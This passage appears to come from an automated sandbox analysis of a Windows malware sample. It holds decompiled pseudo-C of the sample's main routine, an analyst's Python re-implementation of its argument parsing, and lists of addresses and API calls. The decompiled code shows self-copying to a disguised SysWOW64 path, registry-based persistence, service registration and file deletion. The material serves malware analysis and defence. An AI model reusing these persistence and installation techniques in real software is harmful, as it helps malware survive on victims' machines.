	E0040EC54(); // executed
	_t475 =  *0x41201f; // 0x0
	if(_t475 != 0) {
		__eflags =  *0x4133d8; // 0x43
		if(__eflags == 0) {
			L126:
			CreateThread(0, 0, E0040405E, 0, 0, 0);
			__imp__#115(0x1010,  &_v1672);
			E0040E52E(_t449, __eflags);
			E0040EAAF(1, 0);
			E00401D96(_t438, 0x412118);
			E004080C9(_t438);
			CreateThread(0, 0, E0040877E, 0, 0, 0);
			E00405E6C(__eflags);
			E00403132();
			E0040C125(__eflags);
			E00408DB1(_t438);
			Sleep(0xbb8);
			E0040C4EE();
			while(1) {
				__eflags =  *0x4133d0; // 0x0
				if(__eflags == 0) {
					goto L129;
				}
				_t239 = GetTickCount();
				__eflags = _t239 -  *0x4133d0 - 0x109a0;
				if(_t239 -  *0x4133d0 < 0x109a0) {
					L131:
					Sleep(0x1a90);
					continue;
				}
				L129:
				_t238 = E0040C913();
				__eflags = _t238;
				if(_t238 == 0) {
					 *0x4133d0 = GetTickCount();
				}
				goto L131;
			}
		}
		_a12 = 0xa;
		while(1) {
			_t242 = DeleteFileA(0x4133d8);
			__eflags = _t242;
			if(_t242 != 0) {
				break;
			}
			__eflags = _a12;
			if(_a12 <= 0) {
				break;
			}
			_t244 = GetLastError();
			__eflags = _t244 - 2;
			if(_t244 == 2) {
				break;
			}
			_t219 =  &_a12;
			 *_t219 = _a12 - 1;
			__eflags =  *_t219;
			Sleep(0x3e8);
		}
		E0040EE2A(_t438, 0x4133d8, 0, 0x104);
		_t465 = _t465 + 0xc;
		goto L126;
	} else {
		_v12 = 0;
		if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
			_v672 = 0;
		}
		if(_v672 == 0x22) {
			E0040EF00( &_v672,  &_v671);
			_t436 = E0040ED23( &_v672, 0x22);
			_t465 = _t465 + 0x10;
			if(_t436 != 0) {
				 *_t436 = 0;
			}
		}
		_t248 = GetCommandLineA();
		_t459 = 0x4122f8;
		_a12 = _t248;
		_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
		_t454 = 0x100;
		_v8 = _t250;
		E0040EE2A(_t438, 0x4122f8, 0, 0x100);
		_t467 = _t465 + 0x28;
		if(_v8 == 0) {
			_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
			_t467 = _t467 + 0x14;
			_v16 = _t257;
			if(_t257 == 0) {
				E0040EF00("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v672);
				_pop(_t438);
				_a12 = GetCommandLineA();
				_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
				E0040EE2A(_t438, 0x4122f8, 0, 0x100);
				_t468 = _t467 + 0x28;
				__eflags = _v8;
				if(_v8 == 0) {
					L102:
					_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
					E0040EE2A(_t438, _t459, 0, _t454);
					_t467 = _t468 + 0x28;
					__eflags = _v8;
					if(_v8 == 0) {
						L110:
						_t267 = E00406EC3();
						__eflags = _t267;
						if(_t267 != 0) {
							E004098F2(_t438);
							L19:
							ExitProcess(0); // executed
						}
						__eflags = _v372;
						if(_v372 == 0) {
							L116:
							 *0x4133b0 = 0;
                                                                                										L117:
                                                                                										_v64.hProcess =  &_v372;
                                                                                										_v64.hThread = E00409961;
                                                                                										_v64.dwProcessId = 0;
                                                                                										_v64.dwThreadId = 0;
                                                                                										StartServiceCtrlDispatcherA( &_v64); // executed
                                                                                										goto L19;
                                                                                									}
                                                                                									_t272 =  &_v372;
                                                                                									_t449 = _t272 + 1;
                                                                                									do {
                                                                                										_t438 =  *_t272;
                                                                                										_t272 = _t272 + 1;
                                                                                										__eflags = _t438;
                                                                                									} while (_t438 != 0);
                                                                                									__eflags = _t272 - _t449 - 0x20;
                                                                                									if(_t272 - _t449 >= 0x20) {
                                                                                										goto L116;
                                                                                									}
                                                                                									E0040EF00("htdzdeug",  &_v372);
                                                                                									_pop(_t438);
                                                                                									goto L117;
                                                                                								}
                                                                                								_t459 = _v8 + 3;
                                                                                								_t276 = E0040ED03(_t459, 0x20);
                                                                                								_pop(_t438);
                                                                                								__eflags = _t276;
                                                                                								if(_t276 != 0) {
                                                                                									L107:
                                                                                									_t454 = _t276 - _t459;
                                                                                									__eflags = _t454 - 0x20;
                                                                                									if(_t454 >= 0x20) {
                                                                                										_t454 = 0x1f;
                                                                                									}
                                                                                									E0040EE08(0x412184, _t459, _t454);
                                                                                									_t467 = _t467 + 0xc;
                                                                                									 *((char*)(_t454 + 0x412184)) = 0;
                                                                                									goto L110;
                                                                                								}
                                                                                								_t279 = _t459;
                                                                                								_t449 = _t279 + 1;
                                                                                								do {
                                                                                									_t438 =  *_t279;
                                                                                									_t279 = _t279 + 1;
                                                                                									__eflags = _t438;
                                                                                								} while (_t438 != 0);
                                                                                								_t276 = _t279 - _t449 + _t459;
                                                                                								__eflags = _t276;
                                                                                								goto L107;
                                                                                							}
                                                                                							_t282 = _v8 + 3;
                                                                                							_v672 = 0;
                                                                                							__eflags =  *_t282 - 0x22;
                                                                                							_v20 = _t282;
                                                                                							if( *_t282 != 0x22) {
                                                                                								_t283 = E0040ED03(_v20, 0x20);
                                                                                								_pop(_t438);
                                                                                								__eflags = _t283;
                                                                                								if(_t283 == 0) {
                                                                                									_t283 =  &(_a12[lstrlenA(_a12)]);
                                                                                									__eflags = _t283;
                                                                                								}
                                                                                								_t284 = _t283 - _v8;
                                                                                								_v24 = _t284;
                                                                                								__eflags = _t284 + 0xfffffffd;
                                                                                								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
                                                                                								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
                                                                                								L98:
                                                                                								_t468 = _t468 + 0xc;
                                                                                								L99:
                                                                                								__eflags = _v672;
                                                                                								if(_v672 != 0) {
                                                                                									E0040EE08("C:\Users\hardz\Desktop\file.exe",  &_v672, 0x103);
                                                                                									_t468 = _t468 + 0xc;
                                                                                								}
                                                                                								 *0x412cc0 = 1;
                                                                                								goto L102;
                                                                                							}
                                                                                							_v20 = _v8 + 4;
                                                                                							_t294 = E0040ED03(_v8 + 4, 0x22);
                                                                                							_pop(_t438);
                                                                                							__eflags = _t294;
                                                                                							if(_t294 == 0) {
                                                                                								goto L99;
                                                                                							}
                                                                                							_v24 = _t294 - _v8;
                                                                                							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
                                                                                							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
                                                                                							goto L98;
                                                                                						}
                                                                                						_v36 = 0;
                                                                                						if(_t257 >= 4 || _v48 > 0x61 && _v44 != 0) {
                                                                                							L84:
                                                                                							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
                                                                                								_t303 =  &_v672;
                                                                                								if(_v672 == 0x22) {
                                                                                									_t303 =  &_v671;
                                                                                								}
                                                                                								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
                                                                                									_t303[3] = 0;
                                                                                									_t304 = GetDriveTypeA(_t303);
                                                                                									_t515 = _t304 - 2;
                                                                                									if(_t304 != 2) {
                                                                                										E00409145(_t515);
                                                                                										_t438 = 1;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							goto L19;
                                                                                						} else {
                                                                                							E00404280(_t438, 1);
                                                                                							_pop(_t438);
                                                                                							if(_v672 == 0) {
                                                                                								goto L84;
                                                                                							}
                                                                                							_t309 = E0040675C( &_v672,  &_v12, 0);
                                                                                							_t467 = _t467 + 0xc;
                                                                                							_v8 = _t309;
                                                                                							if(_t309 == 0 || _v12 == 0) {
                                                                                								goto L84;
                                                                                							} else {
                                                                                								_v32 = 0;
                                                                                								_v28 = 0;
                                                                                								if(_v16 == 2) {
                                                                                									L55:
                                                                                									__eflags = _v16 - 3;
                                                                                									if(_v16 >= 3) {
                                                                                										L83:
                                                                                										E0040EC2E(_v8);
                                                                                										_pop(_t438);
                                                                                										if(_v36 != 0) {
                                                                                											goto L19;
                                                                                										}
                                                                                										goto L84;
                                                                                									}
                                                                                									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
                                                                                									_t469 = _t467 + 0x14;
                                                                                									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
                                                                                									if(__eflags == 0) {
                                                                                										L82:
                                                                                										E0040EE2A(_t438, _t459, 0, _t454);
                                                                                										_t467 = _t469 + 0xc;
                                                                                										goto L83;
                                                                                									}
                                                                                									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
                                                                                									_t469 = _t469 + 0x14;
                                                                                									__eflags = _t318;
                                                                                									if(_t318 == 0) {
                                                                                										goto L82;
                                                                                									}
                                                                                									E0040EE2A(_t438, _t459, 0, _t454);
                                                                                									_t470 = _t469 + 0xc;
                                                                                									_v1272 = 0x22;
                                                                                									lstrcpyA( &_v1271,  &_v672);
                                                                                									_t324 = lstrlenA( &_v1272);
                                                                                									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
                                                                                									_t325 = _t324 + 1;
                                                                                									__eflags = _v16 - 2;
                                                                                									_a12 = _t325;
                                                                                									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
                                                                                									if(_v16 != 2) {
                                                                                										L60:
                                                                                										_push(0);
                                                                                										_push( &_v112);
                                                                                										_t328 = E00406DC2(_t438) ^ 0x61616161;
                                                                                										__eflags = _t328;
                                                                                										_push(_t328);
                                                                                										E0040F133();
                                                                                										_t470 = _t470 + 0xc;
                                                                                										L61:
                                                                                										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                										_t471 = _t470 + 0x14;
                                                                                										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
                                                                                										_v20 = _t332;
                                                                                										__eflags = _t332;
                                                                                										if(_t332 == 0) {
                                                                                											_t373 =  &(_a12[1]);
                                                                                											__eflags = _t373;
                                                                                											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
                                                                                											RegCloseKey(_v24);
                                                                                										}
                                                                                										E0040EE2A(_t438, _t459, 0, _t454);
                                                                                										E0040EE2A(_t438,  &_v772, 0, 0x44);
                                                                                										_v772.cb = 0x44;
                                                                                										E0040EE2A(_t438,  &_v64, 0, 0x10);
                                                                                										_t469 = _t471 + 0x24;
                                                                                										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
                                                                                										__eflags = _t340;
                                                                                										if(_t340 != 0) {
                                                                                											__eflags = _v372 - 0x22;
                                                                                											_t357 =  &_v372;
                                                                                											_v40 = _t357;
                                                                                											if(_v372 == 0x22) {
                                                                                												_t357 =  &_v371;
                                                                                												_v40 = _t357;
                                                                                											}
                                                                                											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
                                                                                											if( *((char*)(_t357 + 1)) == 0x3a) {
                                                                                												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
                                                                                												if( *((char*)(_t357 + 2)) == 0x5c) {
                                                                                													_t358 = _v40;
                                                                                													_t438 = _t358[3];
                                                                                													_a15 = _t358[3];
                                                                                													_t358[3] = 0;
                                                                                													_t359 = GetDriveTypeA(_t358);
                                                                                													__eflags = _t359 - 2;
                                                                                													if(_t359 != 2) {
                                                                                														_t438 = _v40;
                                                                                														_v40[3] = _a15;
                                                                                														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
                                                                                														E0040EE2A(_v40, _t459, 0, _t454);
                                                                                														_t469 = _t469 + 0x20;
                                                                                														__eflags = _v372 - 0x22;
                                                                                														if(_v372 != 0x22) {
                                                                                															lstrcatA( &_v1272, "\"");
                                                                                														}
                                                                                														lstrcatA( &_v1272,  &_v372);
                                                                                														__eflags = _v372 - 0x22;
                                                                                														if(_v372 != 0x22) {
                                                                                															lstrcatA( &_v1272, "\"");
                                                                                														}
                                                                                														_v36 = 1;
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                										__eflags = _v32;
                                                                                										if(_v32 != 0) {
                                                                                											__eflags = _v28;
                                                                                											if(_v28 != 0) {
                                                                                												wsprintfA( &_v372, "%X%08X", _v28, _v32);
                                                                                												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
                                                                                												E0040EE2A(_t438, _t459, 0, _t454);
                                                                                												_t469 = _t469 + 0x30;
                                                                                												lstrcatA( &_v1272,  &_v372);
                                                                                											}
                                                                                										}
                                                                                										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
                                                                                										__eflags = _t344;
                                                                                										if(_t344 == 0) {
                                                                                											DeleteFileA( &_v672);
                                                                                											_v36 = 0;
                                                                                										}
                                                                                										__eflags = _v16 - 1;
                                                                                										if(_v16 == 1) {
                                                                                											__eflags = _v20;
                                                                                											if(_v20 == 0) {
                                                                                												E004096FF(_t438);
                                                                                											}
                                                                                										}
                                                                                										goto L82;
                                                                                									}
                                                                                									__eflags = _v112;
                                                                                									if(_v112 != 0) {
                                                                                										goto L61;
                                                                                									}
                                                                                									goto L60;
                                                                                								}
                                                                                								_t379 = GetTempPathA(0x1f4,  &_v1272);
                                                                                								_t494 = _t379;
                                                                                								if(_t379 == 0) {
                                                                                									goto L55;
                                                                                								}
                                                                                								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
                                                                                								_t467 = _t467 + 0x14;
                                                                                								if(_t383 == 0) {
                                                                                									goto L55;
                                                                                								}
                                                                                								_v80 = 0;
                                                                                								if(_v16 < 3 || _v372 == 0) {
                                                                                									_push(0);
                                                                                									_push( &_v80);
                                                                                									_push(E00406DC2(_t438) ^ 0x61616161);
                                                                                									E0040F133();
                                                                                									_t474 = _t467 + 0xc;
                                                                                									lstrcpyA( &_v372, E00406CC9(_t438));
                                                                                									lstrcatA( &_v372,  &_v80);
                                                                                									lstrcatA( &_v372,  &E0041070C);
                                                                                									_t396 = 0;
                                                                                									__eflags = 0;
                                                                                									goto L43;
                                                                                								} else {
                                                                                									_t410 =  &_v372;
                                                                                									_t450 = _t410 + 1;
                                                                                									do {
                                                                                										_t441 =  *_t410;
                                                                                										_t410 = _t410 + 1;
                                                                                									} while (_t441 != 0);
                                                                                									_t411 = _t410 - _t450;
                                                                                									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
                                                                                										_t411 = _t411 - 1;
                                                                                									}
                                                                                									_t451 = _t411;
                                                                                									if(_t411 <= 0) {
                                                                                										L41:
                                                                                										_t449 = _t451 - _t411;
                                                                                										_a12 = _t451 - _t411;
                                                                                										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
                                                                                										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
                                                                                										_t474 = _t467 + 0xc;
                                                                                										_t396 = 1;
                                                                                										L43:
                                                                                										if(_v44 == 0 || _v48 < 0x50) {
                                                                                											_t438 = 1;
                                                                                											__eflags = 1;
                                                                                										} else {
                                                                                											_t438 = 0;
                                                                                										}
                                                                                										_push(_t438);
                                                                                										_push(_t396);
                                                                                										_push( &_v372);
                                                                                										_push( &_v80);
                                                                                										_push( &_v672);
                                                                                										_push( &_v704);
                                                                                										_t401 = E00409326(_t438, _t449);
                                                                                										_t467 = _t474 + 0x18;
                                                                                										if(_t401 == 0) {
                                                                                											_t402 =  *0x41217c; // 0x0
                                                                                											_v32 = _t402;
                                                                                											_t403 =  *0x412180; // 0x0
                                                                                											goto L54;
                                                                                										} else {
                                                                                											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
                                                                                												_t403 = 0x61040108;
                                                                                												 *0x412180 = 0x61040108;
                                                                                												 *0x41217c = 0;
                                                                                												_v32 = 0;
                                                                                												L54:
                                                                                												_v28 = _t403;
                                                                                												DeleteFileA( &_v672);
                                                                                												goto L55;
                                                                                											}
                                                                                											_t459 = 1;
                                                                                											if(_v16 == 1) {
                                                                                												E004096FF(_t438);
                                                                                											}
                                                                                											_v36 = _t459;
                                                                                											goto L83;
                                                                                										}
                                                                                									} else {
                                                                                										_t442 =  &_v372;
                                                                                										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
                                                                                											_t411 = _t411 - 1;
                                                                                											if(_t411 > 0) {
                                                                                												continue;
                                                                                											}
                                                                                											goto L41;
                                                                                										}
                                                                                										goto L41;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t417 = _v8;
                                                                                					_t454 = _t417 + 3;
                                                                                					_v372 = 0;
                                                                                					if( *((char*)(_t417 + 3)) != 0x22) {
                                                                                						_t418 = E0040ED03(_t454, 0x20);
                                                                                						_pop(_t438);
                                                                                						__eflags = _t418;
                                                                                						if(_t418 == 0) {
                                                                                							_t418 =  &(_a12[lstrlenA(_a12)]);
                                                                                							__eflags = _t418;
                                                                                						}
                                                                                						_t459 = _t418 - _v8;
                                                                                						__eflags = _t459;
                                                                                						E0040EE08( &_v372, _t454, _t459 - 3);
                                                                                						 *((char*)(_t464 + _t459 - 0x173)) = 0;
                                                                                						L13:
                                                                                						_t467 = _t467 + 0xc;
                                                                                						L14:
                                                                                						if(_v372 != 0 && _v672 != 0) {
                                                                                							_t424 = E0040675C( &_v672,  &_v12, 0);
                                                                                							_t467 = _t467 + 0xc;
                                                                                							if(_t424 != 0 && _v12 != 0) {
                                                                                								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
                                                                                								_t467 = _t467 + 0xc;
                                                                                								_v12 = _t426;
                                                                                							}
                                                                                						}
                                                                                						goto L19;
                                                                                					}
                                                                                					_t454 = _t417 + 4;
                                                                                					_t428 = E0040ED03(_t417 + 4, 0x22);
                                                                                					_pop(_t438);
                                                                                					if(_t428 == 0) {
                                                                                						goto L14;
                                                                                					} else {
                                                                                						_t459 = _t428 - _v8;
                                                                                						E0040EE08( &_v372, _t454, _t459 - 4);
                                                                                						 *((char*)(_t464 + _t459 - 0x174)) = 0;
                                                                                						goto L13;
                                                                                					}
                                                                                				}
                                                                                			}
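The block above parses the sample's command line (skipping three leading characters, then taking either a double-quoted argument or an unquoted one up to the next space) and later strips a path down to its last backslash-separated component before copying it into _v80. The following Python is an analyst re-implementation of exactly that visible logic, added here for readability; it is not code from the sample or from the Joe Sandbox report. It assumes E0040ED03 behaves like strchr, E0040EE08 like memcpy, and that _v8 points at a NUL-terminated command-line style string; the function names are chosen here and do not appear in the binary.

```python
# Analyst re-implementation of two routines visible in the decompiled block.
# Assumptions (not confirmed by the report): E0040ED03 == strchr,
# E0040EE08 == memcpy, _v8 == NUL-terminated command-line string.


def parse_first_argument(cmdline: str) -> str:
    """Mirror of the code starting at '_t417 = _v8'.

    Offsets 0..2 are skipped. If the byte at offset 3 is a double quote, the
    argument is the text from offset 4 up to the closing quote, and it is
    empty when no closing quote exists (the native code leaves _v372 empty
    and jumps to L14). Otherwise the argument runs from offset 3 up to the
    next space, or to the end of the string when there is no space.
    """
    # Guard added here: the native code reads cmdline[3] unconditionally.
    if len(cmdline) < 4 or cmdline[3] != '"':
        body = cmdline[3:]
        end = body.find(" ")
        return body if end < 0 else body[:end]
    close = cmdline.find('"', 4)
    if close < 0:
        return ""
    return cmdline[4:close]


def last_path_component(path: str) -> str:
    """Mirror of the backslash scan starting at '_t410 = &_v372'.

    One trailing backslash is ignored, then the scan walks backwards until
    it finds a backslash or reaches the start of the string; the text after
    that point is what the sample copies into _v80.
    """
    n = len(path)
    if n > 0 and path[n - 1] == "\\":
        n -= 1
    end = n
    while n > 0 and path[n - 1] != "\\":
        n -= 1
    return path[n:end]


if __name__ == "__main__":
    # Constructed sample inputs, not values captured from the sandbox run.
    for sample in ['-x "C:\\foo bar\\x.exe" rest', "abcC:\\tmp\\a.exe more", 'abc"open']:
        print(repr(sample), "->", repr(parse_first_argument(sample)))
    for sample in ["C:\\Windows\\Temp\\", "C:\\a\\b.exe", "b.exe"]:
        print(repr(sample), "->", repr(last_path_component(sample)))
```

Running the script on the constructed inputs shows the two behaviours an analyst needs when reproducing the sample's launch conditions: an unterminated quoted argument yields an empty _v372, and a directory path with a trailing backslash yields its final directory name rather than an empty string.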
                                                                                Instruction addresses for the decompiled function above (sidebar column separated from the pseudo-code by extraction): 0x00409a7f through 0x0040a4c3.
                                                                                0x00409c74
                                                                                0x00409c79
                                                                                0x00409c7c
                                                                                0x00409c81
                                                                                0x00000000
                                                                                0x00409c90
                                                                                0x00409c94
                                                                                0x00409c97
                                                                                0x00409c9a
                                                                                0x00409e3e
                                                                                0x00409e3e
                                                                                0x00409e42
                                                                                0x0040a155
                                                                                0x0040a158
                                                                                0x0040a15d
                                                                                0x0040a161
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a161
                                                                                0x00409e66
                                                                                0x00409e6b
                                                                                0x00409e75
                                                                                0x00409e77
                                                                                0x0040a14a
                                                                                0x0040a14d
                                                                                0x0040a152
                                                                                0x00000000
                                                                                0x0040a152
                                                                                0x00409e98
                                                                                0x00409e9d
                                                                                0x00409ea0
                                                                                0x00409ea2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409eab
                                                                                0x00409eb0
                                                                                0x00409ec1
                                                                                0x00409ec8
                                                                                0x00409ed5
                                                                                0x00409edb
                                                                                0x00409ee3
                                                                                0x00409ee4
                                                                                0x00409ee8
                                                                                0x00409eeb
                                                                                0x00409ef2
                                                                                0x00409ef9
                                                                                0x00409efc
                                                                                0x00409efd
                                                                                0x00409f03
                                                                                0x00409f03
                                                                                0x00409f08
                                                                                0x00409f09
                                                                                0x00409f0e
                                                                                0x00409f11
                                                                                0x00409f2d
                                                                                0x00409f32
                                                                                0x00409f3b
                                                                                0x00409f41
                                                                                0x00409f44
                                                                                0x00409f46
                                                                                0x00409f4b
                                                                                0x00409f4b
                                                                                0x00409f67
                                                                                0x00409f6a
                                                                                0x00409f6a
                                                                                0x00409f73
                                                                                0x00409f82
                                                                                0x00409f8e
                                                                                0x00409f98
                                                                                0x00409f9d
                                                                                0x00409fb4
                                                                                0x00409fba
                                                                                0x00409fbc
                                                                                0x00409fc2
                                                                                0x00409fc9
                                                                                0x00409fcf
                                                                                0x00409fd2
                                                                                0x00409fd4
                                                                                0x00409fda
                                                                                0x00409fda
                                                                                0x00409fdd
                                                                                0x00409fe1
                                                                                0x00409fe7
                                                                                0x00409feb
                                                                                0x00409ff1
                                                                                0x00409ff4
                                                                                0x00409ff8
                                                                                0x00409ffb
                                                                                0x00409ffe
                                                                                0x0040a004
                                                                                0x0040a007
                                                                                0x0040a010
                                                                                0x0040a025
                                                                                0x0040a038
                                                                                0x0040a041
                                                                                0x0040a046
                                                                                0x0040a049
                                                                                0x0040a050
                                                                                0x0040a05e
                                                                                0x0040a05e
                                                                                0x0040a072
                                                                                0x0040a078
                                                                                0x0040a07f
                                                                                0x0040a08d
                                                                                0x0040a08d
                                                                                0x0040a093
                                                                                0x0040a093
                                                                                0x0040a007
                                                                                0x00409feb
                                                                                0x00409fe1
                                                                                0x0040a09a
                                                                                0x0040a09d
                                                                                0x0040a09f
                                                                                0x0040a0a2
                                                                                0x0040a0b6
                                                                                0x0040a0de
                                                                                0x0040a0e7
                                                                                0x0040a0ec
                                                                                0x0040a0fd
                                                                                0x0040a0fd
                                                                                0x0040a0a2
                                                                                0x0040a120
                                                                                0x0040a126
                                                                                0x0040a128
                                                                                0x0040a131
                                                                                0x0040a137
                                                                                0x0040a137
                                                                                0x0040a13a
                                                                                0x0040a13e
                                                                                0x0040a140
                                                                                0x0040a143
                                                                                0x0040a145
                                                                                0x0040a145
                                                                                0x0040a143
                                                                                0x00000000
                                                                                0x0040a13e
                                                                                0x00409ef4
                                                                                0x00409ef7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409ef7
                                                                                0x00409cac
                                                                                0x00409cb2
                                                                                0x00409cb4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409cd5
                                                                                0x00409cda
                                                                                0x00409cdf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409ce9
                                                                                0x00409cec
                                                                                0x00409d58
                                                                                0x00409d59
                                                                                0x00409d64
                                                                                0x00409d65
                                                                                0x00409d6a
                                                                                0x00409d7a
                                                                                0x00409d8b
                                                                                0x00409d9d
                                                                                0x00409da3
                                                                                0x00409da3
                                                                                0x00000000
                                                                                0x00409cf6
                                                                                0x00409cf6
                                                                                0x00409cfc
                                                                                0x00409cff
                                                                                0x00409cff
                                                                                0x00409d01
                                                                                0x00409d02
                                                                                0x00409d06
                                                                                0x00409d0a
                                                                                0x00409d16
                                                                                0x00409d16
                                                                                0x00409d17
                                                                                0x00409d1b
                                                                                0x00409d2f
                                                                                0x00409d2f
                                                                                0x00409d3e
                                                                                0x00409d41
                                                                                0x00409d49
                                                                                0x00409d4f
                                                                                0x00409d52
                                                                                0x00409da5
                                                                                0x00409da8
                                                                                0x00409db6
                                                                                0x00409db6
                                                                                0x00409db0
                                                                                0x00409db0
                                                                                0x00409db0
                                                                                0x00409db7
                                                                                0x00409db8
                                                                                0x00409dbf
                                                                                0x00409dc3
                                                                                0x00409dca
                                                                                0x00409dd1
                                                                                0x00409dd2
                                                                                0x00409dd7
                                                                                0x00409ddc
                                                                                0x00409e21
                                                                                0x00409e26
                                                                                0x00409e29
                                                                                0x00000000
                                                                                0x00409dde
                                                                                0x00409df5
                                                                                0x00409e0c
                                                                                0x00409e11
                                                                                0x00409e16
                                                                                0x00409e1c
                                                                                0x00409e2e
                                                                                0x00409e2e
                                                                                0x00409e38
                                                                                0x00000000
                                                                                0x00409e38
                                                                                0x00409df9
                                                                                0x00409dfd
                                                                                0x00409dff
                                                                                0x00409dff
                                                                                0x00409e04
                                                                                0x00000000
                                                                                0x00409e04
                                                                                0x00409d1d
                                                                                0x00409d1d
                                                                                0x00409d23
                                                                                0x00409d2a
                                                                                0x00409d2d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409d2d
                                                                                0x00000000
                                                                                0x00409d23
                                                                                0x00409d1b
                                                                                0x00409cec
                                                                                0x00409c81
                                                                                0x00409c3f
                                                                                0x00409b47
                                                                                0x00409b4a
                                                                                0x00409b4d
                                                                                0x00409b56
                                                                                0x00409b8b
                                                                                0x00409b91
                                                                                0x00409b92
                                                                                0x00409b94
                                                                                0x00409b9f
                                                                                0x00409b9f
                                                                                0x00409b9f
                                                                                0x00409ba4
                                                                                0x00409ba4
                                                                                0x00409bb3
                                                                                0x00409bb8
                                                                                0x00409bbf
                                                                                0x00409bbf
                                                                                0x00409bc2
                                                                                0x00409bc8
                                                                                0x00409bde
                                                                                0x00409be3
                                                                                0x00409be8
                                                                                0x00409bfa
                                                                                0x00409bff
                                                                                0x00409c02
                                                                                0x00409c02
                                                                                0x00409be8
                                                                                0x00000000
                                                                                0x00409bc8
                                                                                0x00409b58
                                                                                0x00409b5e
                                                                                0x00409b64
                                                                                0x00409b67
                                                                                0x00000000
                                                                                0x00409b69
                                                                                0x00409b6b
                                                                                0x00409b7a
                                                                                0x00409b7f
                                                                                0x00000000
                                                                                0x00409b7f
                                                                                0x00409b67

APIs
• SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
• SetErrorMode.KERNELBASE(00000003), ref: 00409A83
• SetUnhandledExceptionFilter.KERNEL32(00406511), ref: 00409A8A
  • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
  • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
  • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
• GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
• GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
• GetCommandLineA.KERNEL32 ref: 00409AFD
• lstrlenA.KERNEL32(?), ref: 00409B99
• ExitProcess.KERNEL32 ref: 00409C06
• GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
• lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
• lstrcatA.KERNEL32(?,?), ref: 00409D8B
• lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
• GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
• DeleteFileA.KERNEL32(00000022), ref: 00409E38
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
• lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
• lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
• GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
• GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
• GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
• lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
• lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
• lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
